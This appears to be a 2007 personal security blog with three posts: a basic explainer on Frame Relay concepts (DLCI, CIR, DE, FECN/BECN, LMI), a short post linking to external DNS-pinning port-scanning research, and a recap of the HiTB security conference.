How frame-relay works is when the router forwards data to the frame-relay switch, the switch in turn forward the frames to the correct destination over a permanent virtual circuit. At each end of the PVC is identified with a DLCI value with only local significance value. A DLCI value is a 10-bit address in the frame-relay header which provides point-to-point or point-to-multipoint connection. I had drawn a simple diagram which depicts the explaination. For site A to send site B packets, it simply specifies the appropriate DLCI number for the virtual circuit that connects to Site B site in the Frame Relay header. However, please note that the DLCI value does not identify the whole PVC network, instead it is just the connection from your router to the frame-relay switch and when it reaches its destination, the DLCI might be a different value. That explains why it has only local significance. The CIR is the traffic rate at which it is guaranteed by your ISP. If packets are sent faster than the cIR rate which you had agreed with your ISP, your ISP might drop all or some of the excess packets depending on how the network is setup. A DE bit is set in the frame-relay header to indicate excess flow of the packets. So if the network is not congested, the packets will flow through, else the excess packets will be discarded. FECN and BECN are flags set in the frame-relay header to allow control of the congested traffic. If congestion is encountered during the traffic flow, the FECN flag will be set on the switch to indicate that there will be a delay of packets arrival and vice versa with the BECN flag set on the receiving frame-relay switch. In this manner, both the sending and the receiving router can expect congestion in the carrier network and delay of packets upon arrival. The LMI protocol is used for keepalive purposes and global addressing purpose like making the DLCI value to have a global significance. As you can see, i am just explaining in a very very basic manner, because the whole technology is so huge that you can even publish a entire book for it. Configuration wise, i had already shown you guys a few examples with basic and simple frame-relay setups. You guys can read more if you are interested. Just search in wiki or cisco.com and a wealth of information is waiting for you to explore. However, i am still exploring more options in terms of the configuration area.

How about spoofing frame-relay frames and reroute the whole traffic to a bogus network? Personally i had not tried it before because of cost and lack of resources. Secondly, i guess i do not touch frame-relay networks often. Well, if you guys knows how to do frame-relay rerouting or spoofing, let me know.

Dns-Pinning, the next big thing?

2007-04-07T14:08:00.000+08:00

I always admire programmers for their sharp programming skills and their structured way of logical thinking. Me, myself can never be good in programming or scripting. I tried my times to brush up my skills, but always failed at some point. This is the reason why i choose networking over being a developer. If i am good in programming, i would definitely develop hell lot of security tools to cater the community. Now, this lead to a very interesting article i am going to refer you guys to. Have you guys heard of DNS-Pinning? I think its the "Next Big Thing" that is going to have effect on the web community after XSS and CSRF. Well, it all comes down to having ideas and working on a Proof of Concept. We all know that it is possible to port-scan using javascript with XSS and now comes DNS-Pinning. DNS-Pinning is like punching a hole in the firewall and allows scanning on a internal LAN. This is scary because it actually bypass the firewall rules and return all the open ports. I had just tested it on my machine and damn, the results are pretty accurate though. Read on for more information.

http://shampoo.antville.org/stories/1451301/

http://sla.ckers.org/forum/read.php?6,4511,9587#msg-9587

HiTB Aftermath

2007-04-06T22:37:00.000+08:00

Guys, sorry for the lack of updates, i had been really with the HiTB conference. Anyway, last night was the last day of the HiTB conference and alas, i managed to get some well rested sleep. The event was crazy with lotsa security gurus chilling around. Well, i did not manage to capture a lot of images, but well i managed to get the Grugq and Dino to take a picture with me. As for the conference itself, i got to to say i was immensely captivated by the topic of "Robbing Banks: Easier Done Than Said" by Fabrice Marie. During the speech, he teaches you how ATM actually works and how easy it is to rob the bank unnoticingly. Well, you guys can do a google search and look for his past articles, its absolute awesome. Also, the Grugq gave us his insight view of how SIP is so unsecure and how easy it is to penetrate into networks using VoIP. Google him too and you will articles about him. As for me, i will get back on track soon as i have a lot of to catch up. Lastly but not least, i would have to recommend you guy to visit geek00l's blog. It is open source network security at its best. This guy is hell smart, as he dissect TCP and UDP packets like no others. Read to find out: http://geek00l.blogspot.com/

Fabrice in action

Mikko H. Hyppönen from F-Secure in action

Grugq and dino

A shot with Dino

A shot with The Grugq

I got a certificate of participation from Grugq